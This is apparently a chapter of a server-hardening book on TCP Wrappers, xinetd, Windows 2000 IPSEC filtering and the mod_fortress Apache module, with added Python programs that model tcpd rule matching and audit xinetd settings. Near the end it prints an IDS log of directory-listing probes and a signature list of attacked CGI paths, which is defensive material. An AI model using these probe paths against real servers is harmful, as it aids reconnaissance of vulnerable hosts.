The wrapper programs send their logging information to the syslog daemon (syslogd). The disposition of the wrapper logs is determined by the syslog configuration file (usually /etc/syslog.conf). Messages are written to files, to the console, or are forwarded to a @loghost. Some syslogd versions can even forward messages down a |pipeline.


So, TCP Wrappers affords you two powerful advantages:

• Connection logging
• Network access control


The first is a freebie: tcpd logs the connections without your assistance. However, for 
network access control, you must establish the rules. 


TCP Wrappers and Network Access Control 


TCP Wrappers reads network access control rules from two files:

• /etc/hosts.allow—In /etc/hosts.allow, you specify authorized hosts
• /etc/hosts.deny—In /etc/hosts.deny, you specify unauthorized hosts


On a fresh installation, these files are generally empty and look like this:

# hosts.deny   This file describes the names of the hosts which are
#              *not* allowed to use the local INET services, as decided
#              by the '/usr/sbin/tcpd' server.
#
# The portmap line is redundant, but it is left to remind you that
# the new secure portmap uses hosts.deny and hosts.allow.  In particular
# you should know that NFS uses portmap!

# hosts.deny   This file describes the names of the hosts which are
#              *not* allowed to use the local INET services, as decided
#              by the '/usr/sbin/tcpd' server.
#
# The portmap line is redundant, but it is left to remind you that
# the new secure portmap uses hosts.deny and hosts.allow.  In particular
# you should know that NFS uses portmap!


You must make the appropriate entries. Let’s look at some examples. 


Configuring /etc/hosts.deny and /etc/hosts.allow 

Configuring /etc/hosts.deny and /etc/hosts.allow requires some forethought. 
Venema developed a special language (hosts_options) for this purpose, which is 
documented in the hosts_options(5) manual page. As described in that document, 
hosts_options is 


...a simple access control language that is based on client (host name/address, username), 


and server (process name, host name/address) patterns. 


hosts_options supports many features and as you become more familiar with it, you 
can develop complex rules (“if a connection meets this criteria, execute this shell 
command”). For starters, however, until you get more experience, stick to the basics, 
which essentially amount to this: 


daemon_list : client_list 


For example, suppose you entered this line into /etc/hosts.allow: 


ALL: .mycompany.net EXCEPT techsupport.mycompany.net 


Here, all machines in domain mycompany.net except techsupport are allowed to 
connect to all services. This is useful, but only if you also add this entry to 
/etc/hosts.deny: 


ALL: ALL 


Here's why: If you specify the /etc/hosts.allow entry alone, the only host being denied is techsupport.mycompany.net.

As a rule, you should add ALL: ALL to your /etc/hosts.deny file first, which disallows everyone. From there, you can start adding authorized hosts. The reason is that it's easier (and more secure) to specify that "that which is not permitted is denied" than to specify that "that which is not denied is permitted." This way, you account for unknown circumstances.




hosts_options also enables you to get into details. For example, assume that 
/etc/hosts.deny contains these entries: 


ALL: .aol.com, .msn.com 
ALL EXCEPT in.telnetd: techsupport.theircompany.net 


Here, folks from AOL and MSN are blocked, but folks on the host 
techsupport.theircompany.net can access your Telnet services. 


hosts_options Wildcards, Operators, and Shell Functions   Recognizing that you might want to apply some sweeping rules, Venema also incorporated several wildcard statements into hosts_options. These are summarized in Table 16.2.


TABLE 16.2 hosts_options Wildcards

Wildcard    What It Does

ALL         Use the ALL wildcard for sweeping generalizations, including ALL services and ALL remote hosts. Example: ALL: ALL in /etc/hosts.deny denies every host access to all services. (Conversely, ALL: ALL in /etc/hosts.allow allows all hosts to access all services—something you definitely don't want to do.)

KNOWN       Use the KNOWN wildcard when you want to apply a rule to users and hosts that are explicitly named in your access control rules.

LOCAL       Use the LOCAL wildcard for hostnames that have no dots in them (such as your localhost).

PARANOID    Use the PARANOID wildcard when you want tcpd to drop hosts when their hostname doesn't match their address.

UNKNOWN     Use the UNKNOWN wildcard when you want to deny access to unknown hosts or usernames. (In other words, if these users and hosts are not explicitly named in your access control rules, they are denied access.)


The EXCEPT Operator Finally, hosts_options supports one operator: EXCEPT. You 
can use EXCEPT to create exceptions to specific rules in either daemon or client lists. 
For example, suppose you entered this line in /etc/hosts.deny: 


ALL EXCEPT in.telnetd: techsupport.mycompany.net 
Here, you deny all services except Telnet to the host techsupport. But you can also 
stack EXCEPT declarations, like this: 


list EXCEPT list EXCEPT list 
This alone (even without adding conditionally executed shell commands) can get complicated. Therefore, TCP Wrappers comes with tools that verify your rules:

• tcpdchk—The TCP Wrappers configuration checker
• tcpdmatch—The TCP Wrapper oracle


Let’s cover those now. 


tcpdchk: The TCP Wrapper Configuration Checker 
tcpdchk is a tool that verifies your TCP Wrapper setup. As explained in the tcpdchk 
manual page: 


tcpdchk examines your TCP Wrapper configuration and reports all potential and real problems it can find. The program examines the tcpd access control files (by default, these are /etc/hosts.allow and /etc/hosts.deny), and compares the entries in these files against entries in the inetd or tlid network configuration files.


tcpdchk analyzes your configuration for the following problems:

• Bad syntax
• Bad pathnames
• Bad hostnames or IP addresses
• Hostnames that have IP addresses that don't correspond to their hostname (an extension of the PARANOID wildcard functionality)
• Services that you specify rules on, but aren't actually wrapped by tcpd


tcpdchk supports several command-line options, which Table 16.3 summarizes. 


TABLE 16.3 tcpdchk Command-Line Options

Option             What It Does

-a                 Use the -a option to specify that tcpdchk should report on allow rules that aren't accompanied by an explicit ALLOW wildcard.

-d                 Use the -d option to specify that tcpdchk should test rules on hosts.allow and hosts.deny in the current directory instead of /etc. (This is useful if you're building rules in another directory before you actually deploy them.)

-i [inetd.conf]    Use the -i option to specify an alternate inetd.conf. (tcpdchk needs to know which inetd.conf you're using—if not the default—because it tests whether services you have applied access control rules to are actually wrapped.)

-v                 Use the -v option to obtain verbose (and cleanly formatted) output.
tcpdmatch: The TCP Wrapper Oracle

Whereas tcpdchk checks your rules to ensure that they’re sound, tcpdmatch actually 
shows you what will happen when they’re deployed. As explained in the tcpdmatch 
manual page: 


tcpdmatch predicts how the TCP Wrapper would handle a specific request for service. 


The syntax is tcpdmatch [daemon] [host], like this: 


tcpdmatch in.telnetd techsupport.theircompany.net 
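As an added example (not from the book or from the TCP Wrappers distribution), the following Python models tcpd's hosts.allow/hosts.deny evaluation and reports verdicts the way the tcpdmatch oracle does, then runs the two hosts_options rule sets from the preceding sections through it. The Client flags standing in for KNOWN/UNKNOWN/PARANOID lookups are a simplification of tcpd's own name resolution, and the addresses and hostnames are constructed.

```python
"""Added model of tcpd rule evaluation, reported tcpdmatch-style."""
import ipaddress
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass
class Client:
    addr: str                    # peer IP address
    name: Optional[str] = None   # reverse-lookup hostname, None if unknown
    name_verified: bool = True   # False when forward lookup of name != addr


def _match_list(expr: str, matches_one: Callable[[str], bool]) -> bool:
    """Evaluate 'list_1 EXCEPT list_2'; a chain of EXCEPTs nests to the right."""
    head, sep, rest = expr.partition(" EXCEPT ")
    # List members are separated by blanks and/or commas.
    hit = any(matches_one(tok) for tok in head.replace(",", " ").split())
    if sep:
        return hit and not _match_list(rest, matches_one)
    return hit


def _client_matches(tok: str, c: Client) -> bool:
    name = (c.name or "").lower()
    if tok == "ALL":
        return True
    if tok == "KNOWN":                 # hostname resolved and consistent
        return c.name is not None and c.name_verified
    if tok == "UNKNOWN":               # reverse lookup failed
        return c.name is None
    if tok == "LOCAL":                 # hostname without a dot
        return c.name is not None and "." not in c.name
    if tok == "PARANOID":              # hostname and address disagree
        return c.name is not None and not c.name_verified
    if tok.startswith("."):            # .domain: suffix match on the hostname
        return name.endswith(tok.lower())
    if tok.endswith("."):              # "192.168.": prefix match on the address
        return c.addr.startswith(tok)
    if "/" in tok:                     # net/mask form, e.g. 10.0.0.0/255.255.255.0
        return ipaddress.ip_address(c.addr) in ipaddress.ip_network(tok, strict=False)
    return tok.lower() == name or tok == c.addr   # literal hostname or address


def parse_rules(text: str) -> List[Tuple[str, str]]:
    """Return (daemon_list, client_list) pairs; comments and option fields are dropped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 2:
            raise ValueError(f"expected 'daemon_list : client_list': {raw!r}")
        rules.append((" ".join(parts[0].split()), " ".join(parts[1].split())))
    return rules


def _first_match(rules, daemon: str, client: Client) -> Optional[Tuple[str, str]]:
    for dl, cl in rules:
        if (_match_list(dl, lambda t: t in ("ALL", daemon))
                and _match_list(cl, lambda t: _client_matches(t, client))):
            return dl, cl
    return None


def tcpdmatch(allow_text: str, deny_text: str, daemon: str, client: Client) -> Tuple[str, str]:
    """Return ('granted' | 'denied', reason). Order per hosts_access(5): first match in
    hosts.allow grants, then first match in hosts.deny denies, otherwise access is granted."""
    hit = _first_match(parse_rules(allow_text), daemon, client)
    if hit:
        return "granted", f"hosts.allow: {hit[0]}: {hit[1]}"
    hit = _first_match(parse_rules(deny_text), daemon, client)
    if hit:
        return "denied", f"hosts.deny: {hit[0]}: {hit[1]}"
    return "granted", "no rule matched in either file (tcpd grants by default)"


# Constructed rule files reproducing the chapter's two hosts_options examples.
ALLOW_A = "ALL: .mycompany.net EXCEPT techsupport.mycompany.net\n"
DENY_ALL = "ALL: ALL\n"
DENY_B = ("ALL: .aol.com, .msn.com\n"
          "ALL EXCEPT in.telnetd: techsupport.theircompany.net\n")

if __name__ == "__main__":
    for allow, deny, daemon, host in [
        (ALLOW_A, "", "in.ftpd", "outsider.example.net"),
        (ALLOW_A, DENY_ALL, "in.ftpd", "outsider.example.net"),
        (ALLOW_A, DENY_ALL, "in.ftpd", "www.mycompany.net"),
        (ALLOW_A, DENY_ALL, "in.ftpd", "techsupport.mycompany.net"),
        ("", DENY_B, "in.telnetd", "techsupport.theircompany.net"),
        ("", DENY_B, "in.ftpd", "techsupport.theircompany.net"),
        ("", DENY_B, "in.telnetd", "dialup.aol.com"),
    ]:
        verdict, why = tcpdmatch(allow, deny, daemon, Client("192.0.2.9", host))
        print(f"{daemon:<11} {host:<30} {verdict:<8} {why}")
```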


Wrapping Up TCP Wrappers 


TCP Wrappers offers a close facsimile of firewall functionality, and it’s a good choice 
when you can’t use a firewall but still need network access control. 


For example, suppose you have a sacrificial Web host and you want to block everything but HTTP traffic. You can do that, but still cut a hole for SSH connections on port 22 so that your Web developers can upload files, change permissions, configure CGI scripts, and so on. For these tasks, TCP Wrappers is more than sufficient, and saves you money on firewall licenses (which frequently attach on a per-machine or per-processor basis).


NOTE 





Note that TCP Wrappers cannot block HTTP or SSH traffic, conditionally or otherwise. To 
perform these functions, you must either a) set these options in xinetd, or b) set your rules for 
HTTP and SSH individually, in their respective configuration files (httpd.conf and 
ssh2d_config, respectively). 


xinetd

Newer Unix distributions also sometimes use xinetd, the eXtended InterNET
services daemon. xinetd is a more secure replacement for inetd, and offers
advanced features, including

• DoS prevention
• Enhanced access control
• Enhanced logging and log limits
• IPv6 support
• Service offloading (redirecting a service to another host)
• Time-based limits

As described in xinetd's documentation:

xinetd performs the same function as inetd: It starts programs that provide Internet services.
Instead of having such servers started at system initialization time, and be dormant until a
connection request arrives, xinetd is the only daemon process started and it listens on all
service ports for the services listed in its configuration file. When a request comes in, xinetd
starts the appropriate server. Because of the way it operates, xinetd (as well as inetd) is also
referred to as a super-server.

xinetd installs three components:

• /usr/sbin/xinetd: the xinetd executable
• /etc/xinetd.conf: the default xinetd configuration file
• /etc/xinetd.d: the directory that holds per-service configuration files


Table 16.4 lists xinetd's various startup options.

TABLE 16.4 xinetd Startup Options

Option                    Significance

-cc [interval]            Consistency check: specify the interval (in seconds) at
                          which xinetd should check its internal state and
                          assure all is well.

-d                        Run in debug mode and provide verbose output.

-f [configfile]           Specify an alternate configuration file
                          (/etc/xinetd.conf is the default).

-filelog [logfile]        Specify a log filename (where xinetd sends its
                          messages).

-limit [proclimit]        Limit the number of concurrent processes xinetd can
                          start, and therefore block process table overflow
                          attacks.

-logprocs [limit]         Limit the number of concurrent servers for remote user
                          ID acquisition.

-loop [rate]              Set the loop rate: the number of servers per second a
                          service may fork before xinetd deems it looping and
                          deactivates (disables) it. The default is ten.

-pidfile [pidfile]        Where to store the PID.

-reuse                    Set the socket option SO_REUSEADDR before binding the
                          socket to an Internet address.

-shutdownprocs [limit]    Limit the number of concurrent servers for service
                          shutdown.

-syslog [syslogfacility]  Set the syslog facility xinetd logs to, for example
                          daemon, auth, user, or local[0-7].
Configuring xinetd Service Control

xinetd follows inetd's model of partitioning out access control on a by-service basis,
but takes it to a sublime degree, and enables you to specify your rules in one of two
ways:

• In an integrated file (address all services wholesale)
• On a file-by-service basis

A barebones, integrated file looks like this:

service imap
{
    socket_type     = stream
    protocol        = tcp
    wait            = no
    user            = root
    only_from       = 63.69.110.193 127.0.0.1
    banner          = /usr/local/etc/deny_banner
    server          = /usr/local/sbin/imapd
}
service telnet
{
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    redirect        = 192.168.1.7 23
    bind            = 127.0.0.1
    log_on_failure += USERID
}

Here, you enclose each service's directives in braces ({ }). Between the braces, you
specify your rules, one attribute per line. The structure is this:

service <service_name>
{
    <attribute> <assign_op> <value> <value> ...
}

The assignment operator is = to set an attribute, += to add values to it, or -= to
remove values from it (the telnet block's log_on_failure += USERID adds USERID to
whatever the defaults block already logs).

Table 16.5 enumerates valid xinetd attributes.
TABLE 16.5 xinetd Attributes

Attribute         Significance

access_times      xinetd's pièce de résistance: sets the time intervals during
                  which allowed hosts can access the service. The format is
                  hour:min-hour:min (for example, 08:00-17:00).

ATTEMPT           A log_on_failure value: logs failed access attempts.

banner            Names a file whose contents xinetd displays to the remote
                  host whenever a connection is established, whether or not
                  access is granted.

banner_fail       Names a file whose contents xinetd displays when it refuses
                  the connection (the true "deny banner").

banner_success    Names a file whose contents xinetd displays when it accepts
                  the connection.

bind              Binds the service to a specific interface address.

cps               Limits the rate of incoming connections. Syntax is the
                  number of connections per second followed by the number of
                  seconds xinetd should wait before re-enabling the service
                  once that rate is exceeded.

DISABLE           A flag that tells xinetd not to start the service.

disable           An attribute (disable = yes) that achieves the same result
                  as the DISABLE flag.

DURATION          A log_on_success value: logs the session's duration.

enabled           Used in the defaults block: lists the services to enable.

env               Sets environment variables (name=value) for the server.

EXIT              A log_on_success value: logs that the server exited, and
                  its exit status.

FILE              A log_type value: xinetd writes its log to the named file
                  rather than to syslog.

flags             Flags control xinetd's internal behavior. Valid flags
                  include DISABLE, IDONLY, INTERCEPT, NAMEINARGS, NODELAY,
                  NORETRY, and REUSE. To learn their significance, see their
                  entries in this table.

group             Sets the group ID the server runs as (the group must exist
                  in /etc/group).

groups            yes or no: whether the server runs with the supplementary
                  groups of its user.

HOST              A log_on_success/log_on_failure value: logs the remote host
                  address.

id                Identifies a service (by default the service's name; change
                  it when one service name has several entries).

IDONLY            A flag: accept connections only from hosts that identify
                  the remote user (that is, systems running ident). Careful
                  with this one; you can inadvertently block many folks,
                  because few people intentionally run ident anymore.

include           Names a file to include for xinetd rule processing.

includedir        Names a directory whose files are all included (one file
                  per service, by convention).

instances         Sets how many servers can run concurrently for the service.
                  (Stops attackers from using tools such as Octopus to open
                  10,000 connections to a service.)

INTERCEPT         A flag: xinetd intercepts packets or accepted connections to
                  verify that they come from allowed locations.

interface         See bind.

log_on_failure    Sets what xinetd logs when a connection is refused or the
                  server cannot be started. Possible values are ATTEMPT, HOST,
                  RECORD, and USERID. See their entries in this table.

log_on_success    Sets what xinetd logs when a server is started and when it
                  exits. Possible values are DURATION, EXIT, HOST, PID, and
                  USERID. See their entries in this table.

log_type          Sets where xinetd logs events. xinetd allows two logging
                  types: SYSLOG and FILE. See their entries in this table.

max_load          Sets a floating-point load average at which the service
                  stops accepting connections (it resumes when the load drops
                  below that value). A sensible value depends greatly on your
                  operating system and hardware.

NAMEINARGS        A flag: xinetd uses the first argument in server_args as
                  argv[0] when executing the server (this is how you run a
                  service under tcpd, for example).

nice              Sets the server's scheduling priority.

no_access         Sets which hosts to explicitly block. This supports numeric
                  addresses, network names, hostnames, and partial values
                  (address prefixes or net/mask pairs).

NODELAY           A flag: if the service is TCP-based, TCP_NODELAY is set on
                  the socket (TCP only).

NORETRY           A flag: xinetd will not retry if fork() fails.

only_from         Sets which hosts to allow. This supports numeric addresses,
                  network names, hostnames, and partial values (address
                  prefixes or net/mask pairs). If a host matches both
                  only_from and no_access, the more specific match wins.

passenv           A list of environment variables from xinetd's environment
                  that xinetd passes to the server.

PID               A log_on_success value: logs the server's process ID.

port              The service's port.

protocol          Specifies the protocol, which must exist in /etc/protocols.

RECORD            A log_on_failure value: records whatever information the
                  remote end offers (login, shell, exec, finger, terminal
                  type) when the connection is refused or the server cannot
                  be started.

redirect          Redirects the service's TCP connections to another host.
                  The syntax is redirect = ip_address port.

REUSE             A flag that sets SO_REUSEADDR on the service socket.

rpc_number        Sets the program number for an UNLISTED RPC service.

rpc_version       Sets the RPC version for an RPC service.

server            Sets the program to launch for the service (the executable's
                  location).

server_args       Sets the arguments to pass to the server.

socket_type       Specifies the service's socket type: stream, dgram
                  (datagram), raw, or seqpacket (reliable, sequenced packets).

SYSLOG            A log_type value, written as SYSLOG syslog_facility
                  [syslog_level]: xinetd sends its output to syslog. Allowable
                  levels are emerg, alert, crit, err, warning, notice, info,
                  and debug. The default is info.

type              One or more values specifying the service type: RPC,
                  INTERNAL (xinetd itself provides the service), or UNLISTED
                  (a service that does not appear in /etc/services).

user              Sets the user ID the server runs as.

USERID            A log_on_success/log_on_failure value: logs the remote user
                  ID (obtained via ident).

wait              Determines whether the service is single-threaded (yes) or
                  multithreaded (no). For a single-threaded service, xinetd
                  hands the socket to the server and stops handling requests
                  for that service until the server exits; for a multithreaded
                  service, xinetd keeps accepting new requests itself.


The previous barebones example was

service imap
{
    socket_type     = stream
    protocol        = tcp
    wait            = no
    user            = root
    only_from       = 63.69.110.193 127.0.0.1
    banner          = /usr/local/etc/deny_banner
    server          = /usr/local/sbin/imapd
}
service telnet
{
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    redirect        = 192.168.1.7 23
    bind            = 127.0.0.1
    log_on_failure += USERID
}

The imap block's only_from line specifies that only localhost (127.0.0.1) and
63.69.110.193 (mcp.com) can access the imap service; every other host is refused.
You can either specify your rules this way (in one running file with all services
therein), or you can establish an includedir and house files on a per-service basis
in that directory.


Suppose that you want all include files to live in /etc/xinetd.d. To alert xinetd to
this, insert the following line in /etc/xinetd.conf:

includedir /etc/xinetd.d

Then, establish your per-service files in /etc/xinetd.d:

# ls -al /etc/xinetd.d
-rw-r--r--    1 root     root          376 Jan 24  2000 imap
-rw-r--r--    1 root     root          416 Jan 24  2000 imaps
-rw-r--r--    1 root     root          447 Jan 24  2000 ipop2
-rw-r--r--    1 root     root          468 Jan 23 19:28 ipop3
-rw-r--r--    1 root     root          355 Jan 26  2001 ipop3~
-rw-r--r--    1 root     root          344 Jan 23  2000 linuxconf-web
-rw-r--r--    1 root     root          432 Jan 24  2000 pop3s
-rw-r--r--    1 root     root          466 Jan 26  2001 telnet
-rw-r--r--    1 root     root          452 Jan 29  2001 wu-ftpd

(Note the editor backup file ipop3~. xinetd ignores files in an includedir whose
names contain a dot or end in a tilde, so ipop3~ and a copy named telnet.old are
skipped, but a copy named telnet-old would be parsed as a live service.)

In each such file, specify your rules:

# cat /etc/xinetd.d/telnet
service telnet
{
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    # the server line is required when the service is not redirected
    server          = /usr/sbin/in.telnetd
    only_from       = 63.69.110.193 127.0.0.1
    banner          = /usr/local/etc/deny_banner
    bind            = 127.0.0.1
    log_on_failure += USERID
}
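As an added example, not part of xinetd, the following Python parses the block syntax shown above (the chapter's imap and telnet services, plus a constructed defaults block) and reports the attributes a practitioner should look for first: a service with no only_from or no_access, a server that runs as root, and a service with no instances or cps limit. It applies the defaults block before the service's own lines and honours =, += and -= the way xinetd does; include and includedir lines are recorded but the files they name are not read.

```python
"""Parse xinetd.conf-style service blocks and flag security-relevant gaps.

Added example; not part of xinetd. Assumptions: one attribute per line,
'#' comment lines, '=' / '+=' / '-=' operators, and a defaults block that
applies to every service before the service's own assignments.
"""
import re

_BLOCK_RE = re.compile(r"^(service|defaults)(?:\s+(\S+))?\s*\{?$")
_ATTR_RE = re.compile(r"^(\w+)\s*(\+=|-=|=)\s*(.*)$")


def parse_xinetd(text):
    """Return {block_name: [(attribute, operator, [values]), ...]} in file
    order. The defaults block is stored under the name 'defaults';
    include/includedir lines outside any block go under '_includes'."""
    blocks, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line == "{":
            continue
        if line == "}":
            current = None
            continue
        head = _BLOCK_RE.match(line)
        if head and current is None:
            current = blocks.setdefault(head.group(2) or "defaults", [])
            continue
        if current is None:
            words = line.split()
            if words[0] in ("include", "includedir"):
                blocks.setdefault("_includes", []).append((words[0], "=", words[1:]))
                continue
            raise ValueError(f"directive outside a service block: {raw!r}")
        attr = _ATTR_RE.match(line)
        if not attr:
            raise ValueError(f"cannot parse attribute line: {raw!r}")
        current.append((attr.group(1), attr.group(2), attr.group(3).split()))
    return blocks


def effective_attrs(blocks, name):
    """Apply the defaults block, then the service's own lines, honouring the
    '=', '+=' and '-=' operators the way xinetd does."""
    attrs = {}
    for attr, op, values in blocks.get("defaults", []) + blocks[name]:
        if op == "=":
            attrs[attr] = list(values)
        elif op == "+=":
            attrs.setdefault(attr, []).extend(values)
        else:  # -=
            attrs[attr] = [v for v in attrs.get(attr, []) if v not in values]
    return attrs


def audit(blocks):
    """Return human-readable findings for every enabled service."""
    findings = []
    for name in blocks:
        if name == "defaults" or name.startswith("_"):
            continue
        a = effective_attrs(blocks, name)
        if a.get("disable", ["no"])[0].lower() == "yes":
            continue
        if "only_from" not in a and "no_access" not in a:
            findings.append(f"{name}: no only_from/no_access, any host may connect")
        if a.get("user") == ["root"]:
            findings.append(f"{name}: server runs as root")
        if "instances" not in a and "cps" not in a:
            findings.append(f"{name}: no instances/cps limit, open to connection floods")
    return findings


SAMPLE_XINETD_CONF = """
# constructed defaults block (not in the chapter), applied to every service
defaults
{
    instances      = 10
    log_on_failure = HOST
}
# the chapter's integrated example follows
service imap
{
    socket_type = stream
    protocol    = tcp
    wait        = no
    user        = root
    only_from   = 63.69.110.193 127.0.0.1
    banner      = /usr/local/etc/deny_banner
    server      = /usr/local/sbin/imapd
}
service telnet
{
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    redirect        = 192.168.1.7 23
    bind            = 127.0.0.1
    log_on_failure += USERID
}
"""

if __name__ == "__main__":
    blocks = parse_xinetd(SAMPLE_XINETD_CONF)
    print("telnet logs on failure:", effective_attrs(blocks, "telnet")["log_on_failure"])
    for finding in audit(blocks):
        print("WARNING", finding)
```

The telnet block is bound to 127.0.0.1, so it is only reachable locally, but the checker still flags its missing only_from: a later edit that drops the bind line would silently expose it, and the finding makes that change visible in review.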
IP Filtering in Windows

You can also achieve basic firewall functionality in Microsoft Windows (NT, 2000,
XP) without purchasing a firewall proper.

Microsoft's IPSEC and filtering support in Windows 2000 (W2K) includes

• Session integrity: the Windows 2000 IPSEC implementation enables W2K hosts to
  maintain session integrity, thus preventing session hijacking.
• Session privacy: the Windows 2000 IPSEC implementation provides session
  encryption, thus addressing electronic eavesdropping issues.
• Peer authentication: the Windows 2000 IPSEC implementation verifies the identity
  of the peer computer (by Kerberos, an X.509 certificate, or a preshared key)
  before any protected session is established.

W2K provides five components to implement IPSEC: IPSEC policies, the MMC IP
Security Policy Management snap-in, the IPSEC Policy Agent service, the IPSEC
driver, and Internet Key Exchange (IKE).


To set your general IP security policies for a specific network connection, choose My
Computer, Control Panel, Network and Dial-up Connections. This will reveal the
Network and Dial-up Connections applet, which stores your network connections
(see Figure 16.4).

FIGURE 16.4 The Network and Dial-up Connections applet.

Next, right-click your desired connection and choose Properties. In response, W2K
will display the connection's Properties window (see Figure 16.5).

Here, in the list labeled Components Checked Are Used by This Connection, scroll
down to Internet Protocol (TCP/IP), and choose Properties, Advanced, Options. In
response, W2K will display the Advanced TCP/IP Settings window (see Figure 16.6).

FIGURE 16.5 The connection's Properties window.

FIGURE 16.6 The Advanced TCP/IP Settings window.


Here, highlight IP Security, and click Properties. In response, W2K will display the IP
Security window, which offers several choices:

• Do Not Use IPSEC: disables IPSEC for the specified network connection.
• Use This IPSEC Policy: lets you pick a preset IP security policy to apply to the
  specified network connection.
• Selected IP Security Policy Description: reports the selected IP security policy's
  description (something that either you or W2K assigns).

Preset policies specify one of three behaviors:

• Client (Respond Only): this is for low-end, garden-variety connections from
  computers in environments that don't strictly enforce security. Intranets are
  good examples of such environments. Often, only some users and hosts in
  intranets strictly demand security, and therefore the majority of connection
  requests will be for nonencrypted, nontunneled communication. The Client
  (Respond Only) settings specify how a host that exists in such a loose
  environment should respond when another host requests secure communications.
  Note that with this policy alone the host never initiates protection, so its
  traffic to peers that do not ask for IPSEC travels in the clear.
• Server (Request Security): this setting is the next ramp up from Client
  (Respond Only), and is useful in environments where the majority of hosts need
  or demand secure communication. Here, the server isn't passive anymore, but
  instead always asks for secured communications, falling back to clear traffic
  if the peer cannot comply. This policy specifies how the host conducts this
  exchange.
• Secure Server (Require Security): this setting governs the most restrictive
  state, the state in which your W2K host requires secure communications and
  rejects any connection request that fails to meet the requirements you set
  forth in this policy.

These general settings let you specify wide, sweeping IPSEC policies for the specified
connection. However, to enforce more granular and specific policies (in particular,
the IP filter lists and filter actions that give you the packet-filtering behavior
this section is about), you must turn to the MMC-based IPSEC Policy snap-in.


The MMC IPSEC Policy Snap-in 


To start the MMC IPSEC Policy snap-in, choose Start, Run, and type MMC. In response,
W2K will display the Microsoft Management Console (see Figure 16.7).

Next, choose Console, Add/Remove Snap-in, Standalone, Add. In response, W2K will
display the Add Standalone Snap-in window (see Figure 16.8).

Here, scroll down to IP Security Policy Management and choose Add, Finish, Close,
OK. In response, W2K will load the IP Security Policy Management snap-in into your
current MMC console. Here, click IP Security Policies on Local Machine in MMC's
left pane. In response, W2K will display three options:

• Client (Respond Only)
• Server (Request Security)
• Secure Server (Require Security)

FIGURE 16.7 The Microsoft Management Console.

FIGURE 16.8 The Add Standalone Snap-in window.

Here, double-click your desired option. In response, W2K will display that option's
Properties window. In this case, we'll choose Client (Respond Only), shown in
Figure 16.9.

FIGURE 16.9 The Client (Respond Only) Properties window.

Here, select the policy's rule and choose Edit. In response, W2K will display the
Edit Rule Properties window, which offers three tabs:

• Security Methods
• Authentication Methods
• Connection Type

The Security Methods tab offers an interface through which to edit IPSEC
Authentication Header integrity and Encapsulating Security Payload
integrity/confidentiality security methods. For integrity, W2K offers two
algorithms, which we touched on earlier in Chapter 11, "Apache and Authentication:
Who Goes There?":

• MD5: MD5 belongs to a family of one-way hash functions called message digest
  algorithms and was originally defined in RFC 1321. The algorithm takes as input a
  message of arbitrary length and produces as output a 128-bit "fingerprint" or
  "message digest" of the input. It is conjectured that it is computationally
  infeasible to produce two messages having the same message digest, or to produce
  any message having a given prespecified target message digest. The MD5 algorithm
  is intended for digital signature applications, where a large file must be
  "compressed" in a secure manner before being encrypted with a private (secret)
  key under a public-key cryptosystem such as RSA.

• SHA (the NIST Secure Hash Algorithm): SHA is exceptionally strong and has been
  used in defense environments. For example, the Department of Defense requires
  that all DoD-managed systems adhere to the Multilevel Information System Security
  Initiative (MISSI), and use only products cleared by the same. SHA is used in one
  MISSI-cleared product called the Fortezza card, a PCMC
  IA card that provides an extra layer of security to e-mail sent from DoD laptops.
  (SHA is also incorporated into the Secure Data Network System Message Security
  Protocol, a message protocol designed to provide security to the X.400 Message
  Handling environment.) To learn more about SHA, grab Federal Information
  Processing Standards Publication 180-1, located at
  http://www.itl.nist.gov/fipspubs/fip180-1.htm.

SHA is the better choice, because although MD5 is formidable, it's not entirely
secure. Hans Dobbertin (of the German Information Security Agency) demonstrated
that MD5 does have weaknesses. In his 1996 paper, "Cryptanalysis of MD5 Compress,"
Dobbertin described an attack (a collision of the compression function) that
produces the same output for two different inputs.

Dobbertin's attack is obscure, requires considerable technical skill, and is unlikely
in dynamic environments (such as session authentication exchanges). IPSEC, moreover,
uses these hashes inside a keyed HMAC, which collision attacks do not directly break.
However, it does prove that you can circumvent MD5, and there is no reason to pick
the weaker function when SHA-1 costs little more.


Proxy Tools That Work with Apache 


In this section, we'll look at a few third-party proxy tools designed to work with
Apache proxying, including

• mod_fortress
• mod_ip_forwarding
• mod_limitipconn
• mod_rpaf
• mod_tproxy

mod_fortress

mod_fortress, from Interstellar (io@spunge.org), is a GPL firewall-like IDS tool,
which, as explained in its documentation,

...relies on analyzing requests sent from the client to the Web server, and logs specific
malicious requests with extensive info about the attacker as well as the attacked server (if
multiple virtual servers). It also has the capability to act as a nontransparent proxy, thus,
protecting/obscuring your server via sending false return http error codes.

mod_fortress (which supports Apache 1.3.12, on Linux, NetBSD, and OpenBSD)
provides the following features:

• Custom logging
• Detects common CGI/HTTP security requests and scans
• Detects known anti-IDS evasive scanning methods (Whisker, twwwscan, VoidEye,
  and so on)
• Integrated SSL support
• The capability to act as a nontransparent proxy to modify specific requests (such
  as CGI return error codes)

mod_fortress logs are clean and easy to read:


= Source: 65.42.154.230
= Destination: www.spunge.org
= Port: 80
= Request Line: GET /~root/ HTTP/1.0
= Description: /~root/ Directory Listing Attempt
= Method: GET
= Protocol: HTTP/1.0
= Virtual Host: 192.168.254.50
= User-Agent: Mozilla/4.77 (Win95; U)
= Query Arguments:

= Source: 65.42.154.230
= Destination: www.spunge.org
= Port: 80
= Request Line: GET /logs/ HTTP/1.0
= Description: /logs/ Directory Listing Attempt
= Method: GET
= Protocol: HTTP/1.0
= Virtual Host: 192.168.254.50
= User-Agent: Mozilla/4.77 (Win95; U)
= Query Arguments:
mod_fortress relies on various attack signatures, which you load into httpd.conf via
the <FortressSignatures> container. Each line is a request path, a semicolon, the
description to log, and in brackets the false HTTP status to return (0 logs the
request but leaves the real response alone):

<IfModule mod_fortress.c>

# the signatures

<FortressSignatures>
/cgi-bin/; /cgi-bin/ Directory Listing attempt [0]
/cgi-bin/webdist.cgi; Webdist CGI Attempt [404]
/cgi-bin/handler; Handler CGI Attempt [404]
/cgi-bin/wrap; Wrap CGI Attempt [404]
/cgi-bin/pfdisplay.cgi; Pfdisplay CGI Attempt [404]
